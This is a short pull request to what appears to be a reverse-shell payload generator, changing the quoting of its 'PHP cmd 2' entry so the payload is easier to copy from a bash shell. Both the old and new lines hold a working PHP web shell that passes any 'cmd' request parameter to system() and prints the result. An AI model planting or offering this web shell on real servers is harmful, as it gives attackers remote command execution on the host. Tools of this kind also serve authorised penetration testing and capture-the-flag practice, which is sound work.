### PR TITLE
use uniform quotes on "PHP cmd 2" payload

### DIFF
--- a/js/data.js
+++ b/js/data.js
@@ -158,7 +158,7 @@ const reverseShellCommands = withCommandType(
         },
 	{
             "name": "PHP cmd 2",
-            "command": "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"<\/pre>\"; die; }?>",
+            "command": "<?php if(isset($_REQUEST[\"cmd\"])){ echo \"<pre>\"; $cmd = ($_REQUEST[\"cmd\"]); system($cmd); echo \"<\/pre>\"; die; }?>",
             "meta": ["linux", "windows", "mac"]
         },
 	{


### PR DESCRIPTION
minor inconvenience, but copying this particular payload from a bash shell is tedious because it mixes single and double quotes (`"`/`'`) use only double quotes.